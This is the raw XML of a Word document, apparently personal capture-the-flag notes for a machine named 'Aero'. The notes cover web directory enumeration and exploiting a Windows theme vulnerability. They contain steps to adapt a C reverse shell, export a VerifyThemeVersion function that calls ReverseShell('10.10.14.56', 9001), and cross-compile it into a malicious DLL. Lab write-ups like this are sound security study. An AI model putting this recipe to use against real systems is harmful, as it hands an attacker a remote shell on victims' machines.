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BF8BF55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CC3AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aero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F3F3C2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CC3A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C3AF2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CC3AF2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C3AF2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CC3AF2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C3AF2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CC3A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C3AF2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550DCDF6" w:rsidR="00843DCE" w:rsidRDefault="0032079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4" w:history="1">
        <w:r w:rsidRPr="00F9428C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://ip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seclist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/discovery/web-content/raft-small-words</w:t>
      </w:r>
      <w:r w:rsidR="00A8620E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-lowercase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B58C2" w14:textId="3BDEAFC3" w:rsidR="00A8620E" w:rsidRDefault="00A8620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on c=google with window theme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vulernability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bleepingcomputer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website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C571870" w14:textId="27F614C6" w:rsidR="00A8620E" w:rsidRDefault="00A6746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c reverse shell for windows and download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window.c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izeenyy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="008C18E6" w14:textId="3C3FA7F3" w:rsidR="00A8620E" w:rsidRDefault="00A6746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just copy it and paste with name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main.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F3A9BC1" w14:textId="369532C2" w:rsidR="00A67467" w:rsidRDefault="00A6746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changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D3A1A" w14:textId="66741CE0" w:rsidR="00A67467" w:rsidRDefault="003A1A1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static </w:t>
      </w:r>
      <w:r w:rsidR="0029709C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spellStart"/>
      <w:r w:rsidR="0029709C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ReverseShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0029709C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(void) (const char *CLIENT_IP, int CLIENT_PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A5E7E" w14:textId="0864C705" w:rsidR="00A67467" w:rsidRDefault="0029709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delete the {xxx} of main </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5556CF3D" w14:textId="3E60558F" w:rsidR="00A67467" w:rsidRDefault="0029709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delete all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desgins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upper from the main file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4245F5CE" w14:textId="7C596998" w:rsidR="00A67467" w:rsidRDefault="00B60D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delete ifdef all </w:t>
      </w:r>
      <w:r w:rsidR="00283C92">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>line</w:t>
      </w:r>
      <w:r w:rsidR="00283C92">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716BF06A" w14:textId="7B2F3608" w:rsidR="00A67467" w:rsidRDefault="0059545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remove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elsif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08BD88ED" w14:textId="196942B9" w:rsidR="00A67467" w:rsidRDefault="00CF115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under include line </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335DE7DA" w14:textId="0AA43449" w:rsidR="003A1A1E" w:rsidRDefault="003A1A1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last</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD8512" w14:textId="19642EA3" w:rsidR="00CF1154" w:rsidRDefault="00CF115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VerifyThemeVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D160548" w14:textId="40D55800" w:rsidR="00816E1E" w:rsidRDefault="00CF115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ReverseShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“10.10.14.56”,9001)</w:t>
      </w:r>
      <w:r w:rsidR="000578B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2830C1" w14:textId="13E31C68" w:rsidR="00CF1154" w:rsidRDefault="00CF115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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5816F6" w14:textId="6A75B49B" w:rsidR="00816E1E" w:rsidRDefault="00816E1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1C5FA55D" w14:textId="1E2DC214" w:rsidR="00816E1E" w:rsidRDefault="00816E1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x86_64-w64-miggw32-gcc-win32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main.c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-shared -lws2_32</w:t>
      </w:r>
      <w:r w:rsidR="00036C70">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o VerifyThemeVersion.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3EAB25" w14:textId="1AFE4E31" w:rsidR="003A1A1E" w:rsidRDefault="003A1A1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pefile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exports verifyThemeVersion.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC95CF" w14:textId="77777777" w:rsidR="00A67467" w:rsidRDefault="00A67467" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDD838B" w14:textId="77777777" w:rsidR="00CB227B" w:rsidRDefault="00CB227B" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD3D920" w14:textId="77777777" w:rsidR="00A67467" w:rsidRDefault="00A67467" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="443DA1B6" w14:textId="77777777" w:rsidR="00A67467" w:rsidRDefault="00A67467" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402C915D" w14:textId="77777777" w:rsidR="00A8620E" w:rsidRDefault="00A8620E" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659CE6E2" w14:textId="77777777" w:rsidR="00A8620E" w:rsidRDefault="00A8620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36C70"/>
    <w:rsid w:val="000578B0"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00283C92"/>
    <w:rsid w:val="0029709C"/>
    <w:rsid w:val="0032079F"/>
    <w:rsid w:val="003A1A1E"/>
    <w:rsid w:val="003C0ED8"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004974FE"/>
    <w:rsid w:val="00595455"/>
    <w:rsid w:val="00816E1E"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A67467"/>
    <w:rsid w:val="00A8620E"/>
    <w:rsid w:val="00B60D20"/>
    <w:rsid w:val="00CB227B"/>
    <w:rsid w:val="00CC3AF2"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00CF1154"/>
    <w:rsid w:val="00D24B97"/>
    <w:rsid w:val="00D310A5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7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17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-17T17:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>